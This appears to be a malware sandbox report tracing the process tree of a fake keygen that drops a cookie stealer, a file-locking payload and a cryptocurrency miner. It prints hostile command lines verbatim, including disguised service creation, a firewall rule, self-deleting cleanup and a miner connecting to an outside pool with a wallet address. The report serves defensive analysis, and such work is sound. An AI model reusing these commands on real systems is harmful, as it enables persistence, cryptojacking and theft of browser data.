C:\Users\Admin\AppData\Local\Temp\RarSFX23\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX23\BTRSetp.exe"4⤵PID:4376
-
C:\Users\Admin\AppData\Local\Temp\RarSFX34\installer.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX34\installer.exe"5⤵PID:8412
-
C:\ProgramData\5624724.61"C:\ProgramData\5624724.61"6⤵PID:8404
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8404 -s 7287⤵
- Program crash
PID:5412 -
C:\ProgramData\8351687.91"C:\ProgramData\8351687.91"6⤵PID:9116
-
C:\ProgramData\1740325.19"C:\ProgramData\1740325.19"6⤵PID:7816
-
C:\Users\Admin\AppData\Local\Temp\RarSFX23\gdrrr.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX23\gdrrr.exe"4⤵PID:7552
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:7436
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:8368
-
C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe"C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe"1⤵PID:4452
-
C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe"C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe"1⤵PID:4412
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX25\keygen.bat" "2⤵PID:7976
-
C:\Users\Admin\AppData\Local\Temp\RarSFX25\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵PID:6900
-
C:\Users\Admin\AppData\Local\Temp\RarSFX27\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX27\key.exe"4⤵PID:4624
-
C:\Users\Admin\AppData\Local\Temp\RarSFX27\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX27\key.exe -txt -scanlocal -file:potato.dat5⤵PID:5432
-
C:\Users\Admin\AppData\Local\Temp\RarSFX25\keygen-step-1.exekeygen-step-1.exe3⤵PID:5376
-
C:\Users\Admin\AppData\Local\Temp\RarSFX25\keygen-step-2.exekeygen-step-2.exe3⤵PID:1240
-
C:\Users\Admin\AppData\Roaming\80AC.tmp.exe"C:\Users\Admin\AppData\Roaming\80AC.tmp.exe"4⤵PID:6584
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\80AC.tmp.exe"5⤵PID:4832
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK6⤵
- Delays execution with timeout.exe
PID:4864 -
C:\Users\Admin\AppData\Local\Temp\RarSFX25\keygen-step-2.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX25\keygen-step-2.exe"4⤵PID:6364
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX25\keygen-step-2.exe" >> NUL4⤵PID:5776
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
PID:4960 -
C:\Users\Admin\AppData\Local\Temp\RarSFX25\keygen-step-3.exekeygen-step-3.exe3⤵PID:6896
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX25\keygen-step-3.exe"4⤵PID:6620
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:7588 -
C:\Users\Admin\AppData\Local\Temp\RarSFX25\keygen-step-4.exekeygen-step-4.exe3⤵PID:2040
-
C:\Users\Admin\AppData\Local\Temp\RarSFX28\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX28\Setup.exe"4⤵PID:6688
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"5⤵PID:7804
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX28\Setup.exe"5⤵PID:7704
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 36⤵
- Runs ping.exe
PID:5580 -
C:\Users\Admin\AppData\Local\Temp\RarSFX28\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX28\md2_2efs.exe"4⤵PID:4212
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 27085⤵
- Program crash
PID:5404 -
C:\Users\Admin\AppData\Local\Temp\RarSFX28\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX28\file.exe"4⤵PID:7616
-
C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe"C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe"1⤵PID:3600
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX9\keygen.bat" "2⤵PID:6084
-
C:\Users\Admin\AppData\Local\Temp\RarSFX9\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵PID:5188
-
C:\Users\Admin\AppData\Local\Temp\RarSFX10\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX10\key.exe"4⤵PID:4780
-
C:\Users\Admin\AppData\Local\Temp\RarSFX10\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX10\key.exe -txt -scanlocal -file:potato.dat5⤵PID:3088
-
C:\Users\Admin\AppData\Local\Temp\RarSFX9\keygen-step-4.exekeygen-step-4.exe3⤵PID:5244
-
C:\Users\Admin\AppData\Local\Temp\RarSFX10\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX10\Setup.exe"4⤵PID:4380
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"5⤵PID:5760
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX10\Setup.exe"5⤵PID:6192
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 36⤵
- Runs ping.exe
PID:6712 -
C:\Users\Admin\AppData\Local\Temp\RarSFX10\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX10\md2_2efs.exe"4⤵PID:6244
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6244 -s 27165⤵
- Program crash
PID:5384 -
C:\Users\Admin\AppData\Local\Temp\RarSFX10\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX10\file.exe"4⤵PID:7452
-
C:\Users\Admin\AppData\Roaming\3DD6.tmp.exe"C:\Users\Admin\AppData\Roaming\3DD6.tmp.exe"5⤵PID:8172
-
C:\Users\Admin\AppData\Roaming\3DD6.tmp.exe"C:\Users\Admin\AppData\Roaming\3DD6.tmp.exe"6⤵PID:6952
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX10\file.exe"5⤵PID:700
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:6496 -
C:\Users\Admin\AppData\Local\Temp\RarSFX10\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX10\BTRSetp.exe"4⤵PID:7460
-
C:\Users\Admin\AppData\Local\Temp\RarSFX29\installer.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX29\installer.exe"5⤵PID:1540
-
C:\ProgramData\6128860.67"C:\ProgramData\6128860.67"6⤵PID:8460
-
C:\ProgramData\802397.8"C:\ProgramData\802397.8"6⤵PID:8524
-
C:\ProgramData\3372900.37"C:\ProgramData\3372900.37"6⤵PID:8672
-
C:\Users\Admin\AppData\Local\Temp\RarSFX10\gdrrr.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX10\gdrrr.exe"4⤵PID:9056
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:8348
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:208
-
C:\Users\Admin\AppData\Local\Temp\RarSFX9\keygen-step-3.exekeygen-step-3.exe3⤵PID:5236
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX9\keygen-step-3.exe"4⤵PID:5560
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:5144 -
C:\Users\Admin\AppData\Local\Temp\RarSFX9\keygen-step-2.exekeygen-step-2.exe3⤵PID:5228
-
C:\Users\Admin\AppData\Roaming\965B.tmp.exe"C:\Users\Admin\AppData\Roaming\965B.tmp.exe"4⤵PID:5112
-
C:\Users\Admin\AppData\Local\Temp\RarSFX9\keygen-step-2.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX9\keygen-step-2.exe"4⤵PID:5832
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX9\keygen-step-2.exe" >> NUL4⤵PID:5900
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
PID:5528 -
C:\Users\Admin\AppData\Local\Temp\RarSFX9\keygen-step-1.exekeygen-step-1.exe3⤵PID:5220
-
C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe"C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe"1⤵PID:1872
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen.bat" "2⤵PID:4948
-
C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
PID:3216 -
C:\Users\Admin\AppData\Local\Temp\RarSFX7\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX7\key.exe"4⤵
- Executes dropped EXE
PID:5496 -
C:\Users\Admin\AppData\Local\Temp\RarSFX7\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX7\key.exe -txt -scanlocal -file:potato.dat5⤵PID:5536
-
C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:2436 -
C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-step-2.exekeygen-step-2.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4360 -
C:\Users\Admin\AppData\Roaming\71AD.tmp.exe"C:\Users\Admin\AppData\Roaming\71AD.tmp.exe"4⤵
- Executes dropped EXE
PID:5848 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\71AD.tmp.exe"5⤵PID:6604
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK6⤵
- Delays execution with timeout.exe
PID:6788 -
C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-step-2.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-step-2.exe"4⤵
- Executes dropped EXE
PID:5876 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-step-2.exe" >> NUL4⤵PID:5892
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
PID:6016 -
C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
PID:5164 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-step-3.exe"4⤵PID:5628
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:5744 -
C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
PID:5308 -
C:\Users\Admin\AppData\Local\Temp\RarSFX8\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX8\Setup.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
PID:5520 -
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"5⤵
- Suspicious use of FindShellTrayWindow
PID:5976 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX8\Setup.exe"5⤵PID:1256
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 36⤵
- Runs ping.exe
PID:5288 -
C:\Users\Admin\AppData\Local\Temp\RarSFX8\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX8\md2_2efs.exe"4⤵PID:1244
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1244 -s 28245⤵
- Program crash
PID:5616 -
C:\Users\Admin\AppData\Local\Temp\RarSFX8\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX8\file.exe"4⤵PID:6820
-
C:\Users\Admin\AppData\Roaming\D41.tmp.exe"C:\Users\Admin\AppData\Roaming\D41.tmp.exe"5⤵PID:7368
-
C:\Users\Admin\AppData\Roaming\D41.tmp.exe"C:\Users\Admin\AppData\Roaming\D41.tmp.exe"6⤵PID:6732
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX8\file.exe"5⤵PID:5772
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:8128 -
C:\Users\Admin\AppData\Local\Temp\RarSFX8\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX8\BTRSetp.exe"4⤵PID:7928
-
C:\Users\Admin\AppData\Local\Temp\RarSFX24\installer.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX24\installer.exe"5⤵PID:7008
-
C:\ProgramData\7154320.78"C:\ProgramData\7154320.78"6⤵PID:188
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 188 -s 7247⤵
- Program crash
PID:7248 -
C:\ProgramData\1857559.20"C:\ProgramData\1857559.20"6⤵PID:8148
-
C:\ProgramData\2485510.27"C:\ProgramData\2485510.27"6⤵PID:7280
-
C:\Users\Admin\AppData\Local\Temp\RarSFX8\gdrrr.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX8\gdrrr.exe"4⤵PID:8124
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:3412
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:7912
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:7124
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\d53ec052d9c0438b862b8b449ca3ace2 /t 3108 /p 26241⤵PID:6608
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:3100
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:2104
-
C:\Users\Admin\AppData\Local\Temp\3B94.exeC:\Users\Admin\AppData\Local\Temp\3B94.exe1⤵PID:8188
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\8998a070-e5b8-4e62-9734-2e56c0880fb8" /deny *S-1-1-0:(OI)(CI)(DE,DC)2⤵
- Modifies file permissions
PID:6416 -
C:\Users\Admin\AppData\Local\Temp\3B94.exe"C:\Users\Admin\AppData\Local\Temp\3B94.exe" --Admin IsNotAutoStart IsNotTask2⤵PID:8108
-
C:\Users\Admin\AppData\Local\3a65f372-9186-4a3d-bfc1-d29a4c97ebd2\updatewin1.exe"C:\Users\Admin\AppData\Local\3a65f372-9186-4a3d-bfc1-d29a4c97ebd2\updatewin1.exe"3⤵PID:8264
-
C:\Users\Admin\AppData\Local\3a65f372-9186-4a3d-bfc1-d29a4c97ebd2\updatewin2.exe"C:\Users\Admin\AppData\Local\3a65f372-9186-4a3d-bfc1-d29a4c97ebd2\updatewin2.exe"3⤵PID:6664
-
C:\Users\Admin\AppData\Local\3a65f372-9186-4a3d-bfc1-d29a4c97ebd2\updatewin.exe"C:\Users\Admin\AppData\Local\3a65f372-9186-4a3d-bfc1-d29a4c97ebd2\updatewin.exe"3⤵PID:6804
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\3a65f372-9186-4a3d-bfc1-d29a4c97ebd2\updatewin.exe4⤵PID:8600
-
C:\Windows\SysWOW64\timeout.exetimeout /t 35⤵
- Delays execution with timeout.exe
PID:7672 -
C:\Users\Admin\AppData\Local\3a65f372-9186-4a3d-bfc1-d29a4c97ebd2\5.exe"C:\Users\Admin\AppData\Local\3a65f372-9186-4a3d-bfc1-d29a4c97ebd2\5.exe"3⤵PID:9060
-
C:\Users\Admin\AppData\Local\Temp\4D19.exeC:\Users\Admin\AppData\Local\Temp\4D19.exe1⤵PID:6544
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 4D19.exe /f & erase C:\Users\Admin\AppData\Local\Temp\4D19.exe & exit2⤵PID:7192
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 4D19.exe /f3⤵
- Kills process with taskkill
PID:8396
-
C:\Users\Admin\AppData\Local\Temp\5BFF.exeC:\Users\Admin\AppData\Local\Temp\5BFF.exe1⤵PID:5724
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\04e2dd6159bd403a86ccfcd273aebd71 /t 7092 /p 21041⤵PID:8164
-
C:\Users\Admin\AppData\Local\Temp\643D.exeC:\Users\Admin\AppData\Local\Temp\643D.exe1⤵PID:7260
-
C:\Users\Admin\AppData\Local\Temp\6F2B.exeC:\Users\Admin\AppData\Local\Temp\6F2B.exe1⤵PID:3004
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ovmnaapf\2⤵PID:4716
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\wvjlzwxp.exe" C:\Windows\SysWOW64\ovmnaapf\2⤵PID:7744
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create ovmnaapf binPath= "C:\Windows\SysWOW64\ovmnaapf\wvjlzwxp.exe /d\"C:\Users\Admin\AppData\Local\Temp\6F2B.exe\"" type= own start= auto DisplayName= "wifi support"2⤵PID:8060
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description ovmnaapf "wifi internet conection"2⤵PID:8228
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start ovmnaapf2⤵PID:8892
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵PID:8476
-
C:\Users\Admin\AppData\Local\Temp\8295.exeC:\Users\Admin\AppData\Local\Temp\8295.exe1⤵PID:6644
-
C:\Users\Admin\AppData\Local\Temp\9090.exeC:\Users\Admin\AppData\Local\Temp\9090.exe1⤵PID:7584
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7584 -s 38522⤵
- Program crash
PID:7948
-
C:\Users\Admin\AppData\Local\Temp\A3BB.exeC:\Users\Admin\AppData\Local\Temp\A3BB.exe1⤵PID:6176
-
C:\Users\Admin\AppData\Local\Temp\A3BB.exeC:\Users\Admin\AppData\Local\Temp\A3BB.exe2⤵PID:7212
-
C:\Users\Admin\AppData\Local\Temp\B679.exeC:\Users\Admin\AppData\Local\Temp\B679.exe1⤵PID:8308
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵PID:8384
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵PID:9088
-
C:\Windows\SysWOW64\ovmnaapf\wvjlzwxp.exeC:\Windows\SysWOW64\ovmnaapf\wvjlzwxp.exe /d"C:\Users\Admin\AppData\Local\Temp\6F2B.exe"1⤵PID:9104
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵PID:8832
-
C:\Windows\SysWOW64\svchost.exesvchost.exe -o msr.pool-pay.com:6199 -u 9jNvTpsSutBLodbiiRngN2S4AfM84WJ4Y8zRpo6H4QPBK625huByLqkiCTh5Uog1qHVBr7cyZfbA1GiiPqSsSv83HAiirSf.50000 -p x -k3⤵PID:7284
-
C:\Users\Admin\AppData\Local\Temp\C426.exeC:\Users\Admin\AppData\Local\Temp\C426.exe1⤵PID:8724
-
C:\Users\Admin\AppData\Local\Temp\DEC4.exeC:\Users\Admin\AppData\Local\Temp\DEC4.exe1⤵PID:8544
-
C:\Users\Admin\AppData\Local\Temp\7F6A.exeC:\Users\Admin\AppData\Local\Temp\7F6A.exe1⤵PID:5168
-
C:\Users\Admin\AppData\Local\Temp\7F6A.exeC:\Users\Admin\AppData\Local\Temp\7F6A.exe2⤵PID:5736
-
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"3⤵PID:2784
-
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"4⤵PID:6652
-
C:\Users\Admin\AppData\Local\Temp\8F59.exeC:\Users\Admin\AppData\Local\Temp\8F59.exe1⤵PID:9176
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7420
-
C:\Users\Admin\AppData\Local\Temp\D82A.exeC:\Users\Admin\AppData\Local\Temp\D82A.exe1⤵PID:8928
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\Temp\D82A.exe2⤵PID:4652
Network
MITRE ATT&CK Enterprise v6
Persistence
Bootkit
1Modify Existing Service
1New Service
1Registry Run Keys / Startup Folder
1Defense Evasion
File and Directory Permissions Modification
1Install Root Certificate
1Modify Registry
2Virtualization/Sandbox Evasion
1Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
efdc29be15ee37f89bac7805dc8fbd93
SHA1bdb5c636dd5a5150ba99286ff34ab54520c52d04
SHA2562fb55d8b58c27424418ae82406b4f06d8709f91dc405a4f40e38289f60fa901d
SHA5124db99cd36af44646f72b9261921ba34742075748261a156b30d3e73e7f281657565689efa4b55b8eeeba06a1f7193112d9d7c867b53cba69c8de1ce058fe7a28
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e